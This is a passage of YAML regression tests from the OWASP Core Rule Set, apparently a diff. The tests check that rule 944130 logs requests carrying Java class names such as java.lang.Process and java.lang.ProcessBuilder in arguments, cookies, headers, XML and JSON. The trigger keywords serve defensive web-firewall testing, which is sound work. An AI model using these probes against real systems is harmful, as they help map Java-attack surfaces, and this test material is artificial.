port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-269 + desc: "Request header test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-270 + desc: "XML attribute value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-271 + desc: "XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-272 + desc: "Nested XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-273 + desc: "Content-Type text/plain includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-274 + desc: "Content-Type application/json arg value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-275 + desc: "Content-Type application/json arg name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-276 + desc: "Argument test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-277 + desc: "Argument name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-278 + desc: "Cookie test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
test=java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-279 + desc: "Cookie name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-280 + desc: "Request header test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-281 + desc: "XML attribute value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-282 + desc: "XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-283 + desc: "Nested XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-284 + desc: "Content-Type text/plain includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-285 + desc: "Content-Type application/json arg value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: 
"HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-286 + desc: "Content-Type application/json arg name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-287 + desc: "Argument test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-288 + desc: "Argument name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-289 + desc: "Cookie test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-290 + desc: "Cookie name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-291 + desc: "Request header test includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-292 + desc: "XML attribute value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-293 + desc: "XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-294 + desc: "Nested XML element value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-295 + desc: "Content-Type text/plain includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log_contains: "id \"944130\"" + - test_title: 944130-296 + desc: "Content-Type application/json arg value includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-297 + desc: "Content-Type application/json arg name includes keyword java.lang.Number" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-298 + desc: "Argument test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-299 + desc: "Argument name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: 
"HTTP/1.0" + data: "java.lang.Object=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-300 + desc: "Cookie test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-301 + desc: "Cookie name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Object=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-302 + desc: "Request header test includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Object + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-303 + desc: "XML attribute value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-304 + desc: "XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-305 + desc: "Nested XML element value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Object" + output: + log_contains: "id \"944130\"" + - test_title: 944130-306 + desc: "Content-Type text/plain includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Object" 
+ output: + log_contains: "id \"944130\"" + - test_title: 944130-307 + desc: "Content-Type application/json arg value includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Object\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-308 + desc: "Content-Type application/json arg name includes keyword java.lang.Object" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Object\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-309 + desc: "Argument test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-310 + desc: "Argument name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-311 + desc: "Cookie test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-312 + desc: "Cookie name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Process=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-313 + desc: "Request header test includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: 
java.lang.Process + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-314 + desc: "XML attribute value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-315 + desc: "XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-316 + desc: "Nested XML element value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-317 + desc: "Content-Type text/plain includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Process" + output: + log_contains: "id \"944130\"" + - test_title: 944130-318 + desc: "Content-Type application/json arg value includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Process\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-319 + desc: "Content-Type application/json arg name includes keyword java.lang.Process" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Process\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-320 + desc: "Argument test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: 
"HTTP/1.0" + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944130\"" + - test_title: 944130-321 + desc: "Argument name includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-322 + desc: "Cookie test includes keyword java.lang.ProcessBuilder" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 